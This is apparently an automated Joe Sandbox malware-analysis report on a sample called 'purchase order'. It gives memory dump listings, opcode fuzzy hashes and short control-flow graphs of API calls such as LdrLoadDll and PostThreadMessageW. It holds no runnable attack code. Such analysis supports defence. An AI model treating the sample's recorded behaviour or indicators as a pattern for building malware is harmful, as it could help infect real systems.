                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5385722e6385ab72e8ebd9c99178379c47e0d1044942d8e7cdbbdf38fd5d91c9
                                                                                                              • Instruction ID: fd18f7b6821029b2d71de69dc43ff9c400c0d99edb03174ea464d2dcf15e7dae
                                                                                                              • Opcode Fuzzy Hash: 5385722e6385ab72e8ebd9c99178379c47e0d1044942d8e7cdbbdf38fd5d91c9
                                                                                                              • Instruction Fuzzy Hash: 851182B5A002059FDB12DF68D8806AF7BF9FF58301F004425F918C7261D734E9158BA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f1ba5c1180ea9f7b5147287a888e226699d7195aace480af371adb406acd730
                                                                                                              • Instruction ID: 920a04c7463685600f8fe8c8678a79df1d1c3ec8e7fb842130a8ef772a3ea2d4
                                                                                                              • Opcode Fuzzy Hash: 9f1ba5c1180ea9f7b5147287a888e226699d7195aace480af371adb406acd730
                                                                                                              • Instruction Fuzzy Hash: D211CEB5E001199FCB44CFADD4419AEBBF5FF88310B10816AE919E7311D7309911CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: 4dd99e69990244780578a81829675d19f680ee0ea7c4e29680fbc1a8a804b5ce
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: 6E11A276904280CFCB15CF14D5C4B16BF71FB94314F24C5A9DC460B656C33AD866CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: 582ee6aea6e01dfbfac1018e78334ba0e7ee2361f59295c8f223850b33571930
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: 4311DF72904280CFCB12CF00D5C4B16BF72FB94324F24C2A9DC0A0B656C33AE85ACBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 59d06eec7f4fb7bc7ea0e15c9ff232049fc7a8ccf83ecdb7074e6997a0271a6e
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 7311BB75504280CFCB21CF14D5C4B16BBB2FB88314F28C6AAD80D4B656C33AD81ACBA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 652d5c270cb083ad90495f6103861c78353cd1d7ffca6845d0010659d62d00c6
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 8C117975504280DFDB16CF14D5C4B15BBB1FB84324F28C6AAD8494B696C33AD84ACB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b01654af337b021a1ca982f987ba90ad56b0a65ef626b6b1bb903cb10a4364fc
                                                                                                              • Instruction ID: 439b7351820fc9d7c2b62d9e3afceca6e77cfe629699a599d40b5359e66fca86
                                                                                                              • Opcode Fuzzy Hash: b01654af337b021a1ca982f987ba90ad56b0a65ef626b6b1bb903cb10a4364fc
                                                                                                              • Instruction Fuzzy Hash: BE01F171A043448FEF21DFAAD8083DEBFF0EF95310F18884AD45597212CB78984ACB51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ef5fb7f81a5c3ada00fbdf80c001ecf793b31206264b62c6a2fa670f9afed8a
                                                                                                              • Instruction ID: 7527faf75f9868640d6514eedc4d95c4bef1c02d0815af0f6862993c0ca8a48f
                                                                                                              • Opcode Fuzzy Hash: 9ef5fb7f81a5c3ada00fbdf80c001ecf793b31206264b62c6a2fa670f9afed8a
                                                                                                              • Instruction Fuzzy Hash: B501F731A083409AE7204E25CD84B67BF98EF51324F18C52AED0A0A296C67D9C41C672
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4a229e18df1180de11966024cb0b84cb8f1472fed274154c17f9c36c66d4d883
                                                                                                              • Instruction ID: cb07379409593b00ddb1541f467ac50282836ff67148383162a6f46acf9135d5
                                                                                                              • Opcode Fuzzy Hash: 4a229e18df1180de11966024cb0b84cb8f1472fed274154c17f9c36c66d4d883
                                                                                                              • Instruction Fuzzy Hash: C2112571901208DFEB14CF9AC8447EDBFF1FB48354F24C169E9289B250C7749945CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1cf3d337aecbdfa9508bc2b1e6de7729d9ae3b3c7164f7b6ccb7eaa175f5f8ee
                                                                                                              • Instruction ID: 622e7301c4b5631f13521ba416a73137cc0f7c52b479105b94d575a19ee1a45f
                                                                                                              • Opcode Fuzzy Hash: 1cf3d337aecbdfa9508bc2b1e6de7729d9ae3b3c7164f7b6ccb7eaa175f5f8ee
                                                                                                              • Instruction Fuzzy Hash: 00010471900208DFDB14CF9AC8447EEBEF5FB48354F24C169E9289B290C7745945CB94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7e886585f8c2b1ce2e0d9a579cc9ccade8d2b9d251348b74894d19dad3810236
                                                                                                              • Instruction ID: 8ff50aababfa151bb0257a184274f702cc2fcf0ce2da310dde2543b96c6ae6a0
                                                                                                              • Opcode Fuzzy Hash: 7e886585f8c2b1ce2e0d9a579cc9ccade8d2b9d251348b74894d19dad3810236
                                                                                                              • Instruction Fuzzy Hash: 63018C31A186589FEB55DFA5D890A9EBBF6AF89305F10805AF442EB321CB34D800CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7dfe726fd8dfd276b5b76a814da9041bec5952ac5718a2080d7fb4406d8b64c8
                                                                                                              • Instruction ID: 463cba3f9ef2ce0e533a243ec14d59fb126206241d7f3d751e33b19dbf899a0c
                                                                                                              • Opcode Fuzzy Hash: 7dfe726fd8dfd276b5b76a814da9041bec5952ac5718a2080d7fb4406d8b64c8
                                                                                                              • Instruction Fuzzy Hash: 2BF09071B001159B9F15B6E8DD509BFBBBAAB88614B500029F609A7780EE347E0187F9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 16a87c3e8b2662839f788fa1ccd3bedb5cb1929cafce5948866fef7381078da5
                                                                                                              • Instruction ID: 0236ed3651dd07b53b605508c60c85a170b46d2774c47eb676db74ce443c3898
                                                                                                              • Opcode Fuzzy Hash: 16a87c3e8b2662839f788fa1ccd3bedb5cb1929cafce5948866fef7381078da5
                                                                                                              • Instruction Fuzzy Hash: 7AD05E32154B44CFC300EBACE8858A5BBB4EF4A6047440290E1455B232EB61F8558B41
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2699996b10201600e6cb980f9cf8695b0bfb0d3b31afdc13d40a831c15508086
                                                                                                              • Instruction ID: 69ffe852f6d431930e21a119e5dbab987359e478ccce463814f841abbb686819
                                                                                                              • Opcode Fuzzy Hash: 2699996b10201600e6cb980f9cf8695b0bfb0d3b31afdc13d40a831c15508086
                                                                                                              • Instruction Fuzzy Hash: 8DD0C9327401249F8604AA68D400CAA7BA9DB996613014066F905CB331CA61EC5287D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 71a07a975ecaf9a685d735fc7d46f4426ea494b7395b6ef02bba21d1fc03d8fc
                                                                                                              • Instruction ID: 6713405b53e3bac168fe7a5f7388f15383dbc5488fd1f441267dc95cb1109437
                                                                                                              • Opcode Fuzzy Hash: 71a07a975ecaf9a685d735fc7d46f4426ea494b7395b6ef02bba21d1fc03d8fc
                                                                                                              • Instruction Fuzzy Hash: 31D0A93130012897CB252AAAA8082ABBA4DEB40792F004039F60682180CF289820C2EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 95df18d589e59d5598b45fcd8234588fcfc13131193cdbfb813dfed0aab81249
                                                                                                              • Instruction ID: 856c8496215d8b273210051f839dfbd72a1510226a98bb6b187724d328df13ff
                                                                                                              • Opcode Fuzzy Hash: 95df18d589e59d5598b45fcd8234588fcfc13131193cdbfb813dfed0aab81249
                                                                                                              • Instruction Fuzzy Hash: FAD05E351082489FC7019F25D895C95BFF8EF1A724B1680D2FD888B223D231AD16CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd755059daf0da0498681b3a32c42d760447bfc2db0fc7761fb6822e17b85e0a
                                                                                                              • Instruction ID: 883b05e5320291112dcae8f3ec0690d3a706054c2d3571f904b7f8e3ac56ddb9
                                                                                                              • Opcode Fuzzy Hash: dd755059daf0da0498681b3a32c42d760447bfc2db0fc7761fb6822e17b85e0a
                                                                                                              • Instruction Fuzzy Hash: 71E0E278A40109CFCB14CFA4D598AEDBBB0EF0C304F20845AE502AB261CB746804CF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4443d48f14af2c535b9fb58b013521605a53cd799728d5986ac1030fb42aea9c
                                                                                                              • Instruction ID: e43cf0909707565ad3e834ed121dd0fa4cd3180119d06f5f37c78aa5670a9530
                                                                                                              • Opcode Fuzzy Hash: 4443d48f14af2c535b9fb58b013521605a53cd799728d5986ac1030fb42aea9c
                                                                                                              • Instruction Fuzzy Hash: 78B09B2131413913D60831DD64206BE728D47C55A9F500067A60DC77454CC5AD4102EE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dcea9f5cfac542d318b27014d0087cc80725d58e876515100a8b8faabea1972b
                                                                                                              • Instruction ID: 1da5d190700ef7791e5fe29746445042afebe00857dcf0913965c5d16d118425
                                                                                                              • Opcode Fuzzy Hash: dcea9f5cfac542d318b27014d0087cc80725d58e876515100a8b8faabea1972b
                                                                                                              • Instruction Fuzzy Hash: 66D02371C247068DF30077785C0004CBB70FEA2214F41471FD190870E1FB208159C741
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                              • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                              • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                              • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                                              • API String ID: 0-3486158592
                                                                                                              • Opcode ID: eae056b318f8b92a6590024f0ab5a5b38b2289dcf0c9ea111ddcebeff568e8fa
                                                                                                              • Instruction ID: 2399229dcf3700abb173296250479ed79b24203a34c92c25e0a16b7912e92e5a
                                                                                                              • Opcode Fuzzy Hash: eae056b318f8b92a6590024f0ab5a5b38b2289dcf0c9ea111ddcebeff568e8fa
                                                                                                              • Instruction Fuzzy Hash: FE025D34B005158FDB18DFA9C988A6EB7B2BF98710B158269EA15DB375DB30FC02CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b763f659a77783a7a026b2b2141ce58deaede3f7bb5002285eadef622f55af2
                                                                                                              • Instruction ID: 4eab24aa2d5eb5b07760e447d7ab9f16f89e377cd42852d6783a2b969bb12813
                                                                                                              • Opcode Fuzzy Hash: 8b763f659a77783a7a026b2b2141ce58deaede3f7bb5002285eadef622f55af2
                                                                                                              • Instruction Fuzzy Hash: 51E10D74E001198FDB14DFA9C5809AEFBF2FF89305F248559E519AB35AD730A942CFA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844040022.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4a10000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1f6296eea11a1ee8a673fa62adac2107d4f4513ff5be2ca78b1938217db02070
                                                                                                              • Instruction ID: 5e27726b441e136feb6ec44243ee576a89982fa52c024536e500e58724c2301d
                                                                                                              • Opcode Fuzzy Hash: 1f6296eea11a1ee8a673fa62adac2107d4f4513ff5be2ca78b1938217db02070
                                                                                                              • Instruction Fuzzy Hash: C312A7B2C917458AE710CF25EDCC2893BB1B745318BD04A1AD2611F2E9E7B4166EEF4C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c26e290128839e969ffbe1352090f0fe2d092c2d2e8a23ca83b1523bdd702bc
                                                                                                              • Instruction ID: 460dd8811f01a56facb66cdb4e4a719e987cc66966b882d7c3f43eb7dc6b0326
                                                                                                              • Opcode Fuzzy Hash: 6c26e290128839e969ffbe1352090f0fe2d092c2d2e8a23ca83b1523bdd702bc
                                                                                                              • Instruction Fuzzy Hash: D2E11D74E001198FDB54DF99C5809AEFBF2FF89304F248569E415AB35AD730A982CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 30b4f26da5a8f00a5cf60f286daacd9fed392216be395221eb1696b573ae9d07
                                                                                                              • Instruction ID: c623cd4f0b477a83f9eaa63194450339cf96dc740a4d7bc7bc5559005590ceac
                                                                                                              • Opcode Fuzzy Hash: 30b4f26da5a8f00a5cf60f286daacd9fed392216be395221eb1696b573ae9d07
                                                                                                              • Instruction Fuzzy Hash: 7FE1ED74E001198FDB54DFA9C5809AEFBF2FF89304F248169E419AB35AD731A942CF61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dfefdc2a39ca829578a174205b2c2b46b6b321387d26b8c578221c3d6ac84bd3
                                                                                                              • Instruction ID: a18a13228c5762a0b4cc25d9e4ef6c0284ef92eb7c03a1d2ccfa8bf919362801
                                                                                                              • Opcode Fuzzy Hash: dfefdc2a39ca829578a174205b2c2b46b6b321387d26b8c578221c3d6ac84bd3
                                                                                                              • Instruction Fuzzy Hash: 76E1ED74E001198FDB54DFA9C5809AEFBB2FF49308F248169E415AB35AD731AD42CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.2%
                                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                                              Signature Coverage:8.3%
                                                                                                              Total number of Nodes:133
                                                                                                              Total number of Limit Nodes:10

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 215 417e43-417e6c call 42faf3 218 417e72-417e80 call 4300f3 215->218 219 417e6e-417e71 215->219 222 417e90-417ea1 call 42e563 218->222 223 417e82-417e8d call 430393 218->223 228 417ea3-417eb7 LdrLoadDll 222->228 229 417eba-417ebd 222->229 223->222 228->229
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              • Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                              • Instruction ID: 0239aaf377b2fcb4487d59bb34220ffa315be4273f3f7c08583bd14527f70908
                                                                                                              • Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
                                                                                                              • Instruction Fuzzy Hash: 0E0175B1E0020DB7DF10DBE1DC42FDEB7B8AB54308F0041A6E90897240F675EB448795

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 258 42ce23-42ce5c call 404a23 call 42e053 NtClose
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,004169F6,001F0001,?,00000000,?,?,00000104), ref: 0042CE57
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction ID: 33cbf207f0ed10b52c0e063f06a2fa8859cf4e21cf3480f9a20cea2f9fe365d9
                                                                                                              • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction Fuzzy Hash: 16E04F762102147BC520EA5ADC01FDBB75CEBC5754F004419FA0867145C6B57A0187E4

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 272 15a2b60-15a2b6c LdrInitializeThunk
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5966bfc03ea03e1ae3cbee57d5dc93f4cca957ffdcf9300e291bf51276140f0c
                                                                                                              • Instruction ID: 2424b8027435b4b7d907b0c9f962e3447dc40e8d9f6d1ca8a8155c3fdbd08c5b
                                                                                                              • Opcode Fuzzy Hash: 5966bfc03ea03e1ae3cbee57d5dc93f4cca957ffdcf9300e291bf51276140f0c
                                                                                                              • Instruction Fuzzy Hash: 9790026120240003410571584854656404EA7E0211B59D421E1015990DC56589916625

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 0 4145af-4145c9 1 4145cc-414607 0->1 2 414667-4146bd call 417e43 call 404993 call 425593 1->2 3 414609 1->3 20 4146dd-4146e3 2->20 21 4146bf-4146ce PostThreadMessageW 2->21 4 41460a-41460b 3->4 6 414637 4->6 7 41460d-41461f 4->7 6->4 9 414638-41463a 6->9 7->1 16 414621-414628 7->16 12 414644 9->12 13 41463c-414643 9->13 13->12 18 414635-414636 16->18 19 41462a-414633 16->19 18->6 19->18 21->20 22 4146d0-4146da 21->22 22->20
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_400000_purchase order.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID: t577G2K6$t577G2K6
                                                                                                              • API String ID: 1836367815-2667467881

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 23 41464a-414685 call 42efb3 call 42f9c3 28 41468b-4146bd call 404993 call 425593 23->28 29 414686 call 417e43 23->29 34 4146dd-4146e3 28->34 35 4146bf-4146ce PostThreadMessageW 28->35 29->28 35->34 36 4146d0-4146da 35->36 36->34
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                                                                              Strings
